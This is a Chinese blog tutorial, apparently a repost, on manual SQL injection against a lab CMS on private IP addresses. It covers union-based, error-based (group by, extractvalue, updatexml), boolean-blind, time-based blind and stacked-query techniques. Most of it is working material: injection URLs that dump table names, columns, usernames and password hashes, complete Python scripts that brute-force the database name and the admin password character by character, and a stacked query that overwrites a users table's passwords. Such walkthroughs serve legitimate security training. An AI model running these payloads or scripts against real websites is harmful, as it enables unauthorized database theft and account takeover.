菜鸟追梦旅行

这个屌丝很懒，什么也没留下！

热门标签

SQL 注入五大基本手法_sql注入手动注入方法

作者：菜鸟追梦旅行 | 2024-05-30 01:32:15

踩

sql注入手动注入方法

五大基本手法

联合查询

适用数据库中的内容会回显到页面中来的情况。联合查询就是利用 union select 语句，该语句会同时执行两条 select 语句，实现跨库、跨表查询。

必要条件

两条 select 语句查询结果必须具有相同的列数
对应的列数数据类型相同（特殊形况下，条件被放松）

判断查询列数

order by
1

select 语句后 order by 加数字，意为根据第多少列排序。

如果报错，则说明没有该列，继续向小的数字更改查询，直到查询出列数最大值

说明该表有 15 列

判断显示位置

原理

例

将前一条查询语句置为假，查看哪些列会显示在页面

使用数字 1-15 占位，看哪那个位置会显示到页面

http://10.9.47.80/cms/show.php?id=33 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
1

数据库中的敏感信息

敏感信息	含义
version()	数据库版本
database()	当前正在使用的数据库的名称
@@datadir	MySQL服务器的数据目录路径
current_user()	当前用户的用户名和主机名

查看表

information_schema 元数据库中的 tables 表中存储着数据库中所有的表

information_schema.tables 表结构：

用到的字段	含义
table_name	表名
table_schema	表所属的数据库

在 sql 注入中查询所有的表：

http://10.9.47.80/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,table_name,12,13,14,15 from information_schema.tables
1

此处因为联合查询，每列的数据类型不同而报错，将 table_name 转换为 16 进制的数值型

http://10.9.47.80/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,hex(table_name),12,13,14,15 from information_schema.tables
1

总共有 517 个表名，因为此前查出在 cms 表中，增加筛选条件

http://10.9.47.80/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,hex(table_name),12,13,14,15 from information_schema.tables where table_schema=database()
1

十六进制转换成字符

此处可以使用 group_concat() 连接显示出整列中的内容

http://10.9.47.80/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema=database()
1

转码

查看表中字段

用户名和密码可能存于 cms_users 表中

information_schema 元数据库中的 columns 表中存储着数据库中所有的列

information_schema.columns 表结构：

用到的字段（列）	含义
table_schema	所属数据库
column_name	列（字段名）

查看 cms_users 表中的字段

http://10.9.47.80/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schema=database() and table_name='cms_users'
1

查询具体数据

读取用户名、密码

http://10.9.47.80/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,group_concat(username,':',password),12,13,14,15 from cms_users
1

解密

报错注入

在注入点的判断过程中，发现数据库中 SQL 语句的报错信息，会显示在页面中，因此可以利用报错信息进行注入。

报错注入的原理，就是在错误信息中执行 SQL 语句。

group by

?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from
information_schema.tables group by x)a)

?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit
0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
1
2
3
4
5

extractvalue

?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))

?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,32),0x5e))
1
2
3

updatexml

显示长度有限制，可以拆分查询

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)
1
2
3
4
5

例

当 sql 语句出现闭合时，显示报错信息

在报错信息后加报错查询

and updatexml(1,concat(0x5e,(select database()),0x5e),1)
1

爆破账号密码

查看当前数据库

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e)) --+
1

查看当前数据库中的表

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database()),0x5e)) --+
1

报错返回多于一行

加限制条件，一次查询一条，从 limit 1,1 开始，直到查到 limit 7,1 出现 cms_users 表可能存在用户信息

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 7,1),0x5e)) --+
1

查看表中字段

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 1,1),0x5e)) --+
1

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 2,1),0x5e)) --+
1

查询用户名和密码

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select group_concat(username,':',password) from cms_users),0x5e)) --+
1

解密

布尔盲注

页面中有布尔类型的状态，可以根据布尔类型状态，对数据库中的内容进行判断。

数据库设置

phpstudy 的数据库交互太慢，改用 xampp，但 xampp 中无数据库 ‘cms’ ，需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库（phpstudy 和 xampp 使用的不是同一个数据库）

启动 phpstudy（启动 phpstudy 的数据库），打开 cmd

导出数据库 cms

mysqldump -u root -p cms  > c:\cms.sql
1

停止并退出 phpstudy

打开 xampp 的 apache 和 mysql，并开启终端

登录数据库，创建 cms 数据库，进入 cms 数据库，导入数据库

mysql -u root -p

create database cms;

exit
1
2
3
4
5

mysql -u root -p cms < C:\cms.sql
1

成功导入

再次访问

使用条件

当语句后跟正确或错误的语句时页面显示内容不同

http://10.9.47.148/cms/show.php?id=33 and 1=1
1

http://10.9.47.148/cms/show.php?id=33 and 1=2
1

可知，当后面的语句为真时，显示新闻页面

可以利用 1=1 位置的真假返回不同页面判断数据库信息

判断数据库名长度

判断数据库名的长度是否大于 10

http://10.9.47.148/cms/show.php?id=33 and length(database())>10
1

未显示新闻页面，说明判断条件即 length(database())>10 错误，数据库名小于 10 位

多次判断，最后可知数据库名长度为3

http://10.9.47.148/cms/show.php?id=33 and length(database())=3
1

按位测试

使用函数 substr()

按位爆破数据库名

逐个字母进行判断

判断数据库的第一个字母是否为 “s”

http://10.9.47.148/cms/show.php?id=33 and substr(database(),1,1)='s'
1

未返回新闻页面，说明数据库名第一个字母不为 “s”

测试字母 “c”

http://10.9.47.148/cms/show.php?id=33 and substr(database(),1,1)='c'
1

成功返回

编写脚本名爆破数据库名

bp 抓包查看按位测试成功和失败时返回数据包的不同

发现当测试成功时，返回数据包的 Content-Length 长度为 5263，可以利用这一点进行判断

import string
import requests

strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)
database_name=""
# 遍历第1-3位
for i in range(1,4):
    # 每位遍历字母数字下划线
    for j in str:
        url = f"http://10.9.47.148/cms/show.php?id=33 and substr(database(),{i},1)='{j}'"
        res = requests.get(url=url)
        if res.headers["Content-Length"] == "5263":
            database_name+=f"{j}"
            break
print(database_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

爆破表名

逐条查询

http://10.9.47.148/cms/show.php?id=33 and substr((select table_name from information_schema.tables where table_schema = database() limit 1,1),1,1)='l'
# limit 1,1 中第一个 1 代表查询出的第 1 个表名，后面 1 为显示几个表
# 后面的 1.1 为 substr() 中的数值，第一个 1 表示从表名的第 1 个字符起，查询 1 个字符
1
2
3

可以判断出第一个表名的第一个字符为 c

编写脚本

import string
import requests
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)

# 跑第0-20个表
for i in range(0,20):
    # 跑完一个表则重置表名
    table_name = ""
    # 假设每个表的表名最长10位，每个表名按位查询
    for j in range(1,10):
        for name_str in str:
            url = f"http://10.9.47.148/cms/show.php?id=33 and substr((select table_name from information_schema.tables where table_schema = database() limit {i},1),{j},1)='{name_str}'"
            res = requests.get(url=url)
            # 返回数据包的头部 Content-Length 值位 5263 则说明查到该位的正确字符，将此字符拼接到表名，继续爆破下个字符
            if res.headers["Content-Length"] == "5263":
                table_name+=name_str
                break
    print(table_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

爆破字段

http://10.9.47.148/cms/show.php?id=33 and substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 1,1),1,1)='u'
# limit 1,1 中第一个 1 代表查询出的第 1 个字段名，后面 1 为查询几个字段
# 后面的 1.1 为 substr() 中的数值，第一个 1 表示从字段名的第 1 个字符起，查询 1 个字符
1
2
3

脚本源码

import string
import requests
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)

# 跑第0-10个字段（假设最多10个字段）
for i in range(0,10):
    # 跑完一个字段则重置字段名
    column_name = ""
    # 假设每个表的字段名最长10位，每个字段名按位查询
    for j in range(1,10):
        for name_str in str:
            url = f"http://10.9.47.148/cms/show.php?id=33 and substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {i},1),{j},1)='{name_str}'"
            res = requests.get(url=url)
            # 返回数据包的头部 Content-Length 值位 5263 则说明查到该位的正确字符，将此字符拼接到字段名，继续爆破下个字符
            if res.headers["Content-Length"] == "5263":
                column_name+=name_str
                break
    print(column_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

爆破用户名

http://10.9.47.148/cms/show.php?id=33 and substr((select username from cms_users limit 1,1),1,1)='a'
# limit 1,1 中第一个 1 代表查询出的第 1 个用户名，后面 1 为查询几个用户名
# 后面的 1.1 为 substr() 中的数值，第一个 1 表示从用户名的第 1 个字符起，查询 1 个字符
1
2
3

脚本源码

import string
import requests
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)

# 跑第0-10个用户名
for i in range(0,10):
    # 跑完一个表则重置用户名
    user_name = ""
    # 假设每个用户的表名最长10位，每个用户名按位查询
    for j in range(1,10):
        for name_str in str:
            url = f"http://10.9.47.148/cms/show.php?id=33 and substr((select username from cms_users limit {i},1),{j},1)='{name_str}'"
            res = requests.get(url=url)
            # 返回数据包的头部 Content-Length 值位 5263 则说明查到该位的正确字符，将此字符拼接到用户名，继续爆破下个字符
            if res.headers["Content-Length"] == "5263":
                user_name+=name_str
                break
    print(user_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

爆破 admin 密码

源码

import string
import requests
import hashlib
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)
password = ""
# md 5 加密后 32 位，爆破 32 位
for j in range(1,33):
    for name_str in str:
        url = f"http://10.9.47.148/cms/show.php?id=33 and substr((select password from cms_users where username = 'admin' limit 0,1),{j},1)='{name_str}'"
        res = requests.get(url=url)
        # 返回数据包的头部 Content-Length 值位 5263 则说明查到该位的正确字符，将此字符拼接到密码，继续爆破下个字符
        if res.headers["Content-Length"] == "5263":
            password+=name_str
            break
print(password)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

解码

延时注入

由于网络问题等原因，若超时时间太短可能造成爆破不准确，但超时时间设置过长会导致爆破时间成本上升

原理

通过 if 中的条件，如果为真则沉睡，否则不沉睡

此处按位测试第一个字符，如果当前数据库第一个字符匹配时，则加载五秒

http://10.9.47.148/cms/show.php?id=33 and if(substr(database(),1,1)='c',sleep(5),1)
1

脚本中的判断条件：延时

为了节省爆破时间，将延时改为 1

此种方法爆破时间比延时注入长

数据库爆破

import string
import requests

strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)
database_name=""
# 遍历第0-3位
for i in range(0,4):
    # 每位遍历字母数字下划线
    for j in str:
        url=f"http://10.9.47.148/cms/show.php?id=33 and if(substr(database(),{i},1)='{j}',sleep(1),1)"
        # 捕获异常，如果超时，则该字符匹配，在 password_name 后拼接该字符
        try:
            res = requests.get(url=url,timeout=1)
        except requests.exceptions.ReadTimeout:
            database_name+=j
            break
print(database_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

表名爆破

依次判断每个表的每个字符，若沉睡，则字符匹配

http://10.9.47.148/cms/show.php?id=33 and if(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)='c',sleep(5),1)
1

脚本源码

import string
import requests
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)

# 跑第0-20个表
for i in range(0,20):
    # 跑完一个表则重置表名
    table_name = ""
    # 假设每个表的表名最长10位，每个表名按位查询
    for j in range(1,10):
        for name_str in str:
            url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select table_name from information_schema.tables where table_schema = database() limit {i},1),{j},1)='{name_str}',sleep(1),1)"
            # 捕获异常，如果超时，则该字符匹配，在 password_name 后拼接该字符
            try:
                res = requests.get(url=url, timeout=1)
            except requests.exceptions.ReadTimeout:
                table_name += name_str
                break
    print(table_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

爆破出 cms_users 表

爆破字段

http://10.9.47.148/cms/show.php?id=33 and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 0,1),1,1)='u',sleep(5),1)
1

若字符匹配则延迟

由于网络问题等原因，若超时时间太短可能造成爆破不准确，但超时时间设置过长会导致爆破时间成本上升，为提升准确性，爆破时间稍长，不报错则耐心等待

import string
import requests
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)

# 跑第0-10个字段（假设最多10个字段）
for i in range(0,10):
    # 跑完一个字段则重置字段名
    column_name = ""
    # 假设每个表的字段名最长10位，每个字段名按位查询
    for j in range(1,10):
        for name_str in str:
            url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {i},1),{j},1)='{name_str}',sleep(3),1)"
            # 捕获异常，如果超时，则该字符匹配，在 password_name 后拼接该字符
            try:
                res = requests.get(url=url, timeout=3)
            except requests.exceptions.ReadTimeout:
                column_name += name_str
                break
    print(column_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

爆破用户名

http://10.9.47.148/cms/show.php?id=33 and if(substr((select username from cms_users limit 0,1),1,1)='a',sleep(5),1)
1

脚本源码

import string
import requests
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)

# 跑第0-10个字段（假设最多10个字段）
for i in range(0,10):
    # 跑完一个字段则重置字段名
    column_name = ""
    # 假设每个表的字段名最长10位，每个字段名按位查询
    for j in range(1,10):
        for name_str in str:
            url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select username from cms_users limit {i},1),{j},1)='{name_str}',sleep(5),1)"
            # 捕获异常，如果超时，则该字符匹配，在 password_name 后拼接该字符
            try:
                res = requests.get(url=url, timeout=1)
            except requests.exceptions.ReadTimeout:
                column_name += name_str
                break
    print(column_name)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

爆破 admin 密码

源码

import string
import requests
# 定义表名字符集（字母数字下划线）
strings = string.digits+string.ascii_letters+'_'
str =  []
for i in strings:
    str.append(i)
password = ""
# md 5 加密后 32 位，爆破 32 位
for j in range(1,33):
    for name_str in str:
        url = f"http://10.9.47.148/cms/show.php?id=33 and if(substr((select password from cms_users where username = 'admin' limit 0,1),{j},1)='{name_str}',sleep(1),1)"
        res = requests.get(url=url)
        # 捕获异常，如果超时，则该字符匹配，在 password_name 后拼接该字符
        try:
            res = requests.get(url=url, timeout=1)
        except requests.exceptions.ReadTimeout:
            password += name_str
            break
print(password)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

解密

堆叠查询

;结束上条 SQL 语句，另起一条语句进行增删改查操作

一次HTTP 请求，可以同时执行多条SQL 语句，包括增删改查操作。

 ?id=2';update users set password='123456'--+
1

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/644771

SQL 注入 五大基本手法_sql注入手动注入方法

五大基本手法

联合查询

必要条件

判断查询列数

判断显示位置

数据库中的敏感信息

查看表

查看表中字段

查询具体数据

报错注入

group by

extractvalue

updatexml

例

爆破账号密码

查看当前数据库

查看当前数据库中的表

查看表中字段

查询用户名和密码

布尔盲注

数据库设置

使用条件

判断数据库名长度

按位测试

按位爆破数据库名

编写脚本名爆破数据库名

爆破表名

爆破字段

爆破用户名

爆破 admin 密码

延时注入

原理

数据库爆破

表名爆破

爆破字段

爆破用户名

爆破 admin 密码

堆叠查询

SQL 注入五大基本手法_sql注入手动注入方法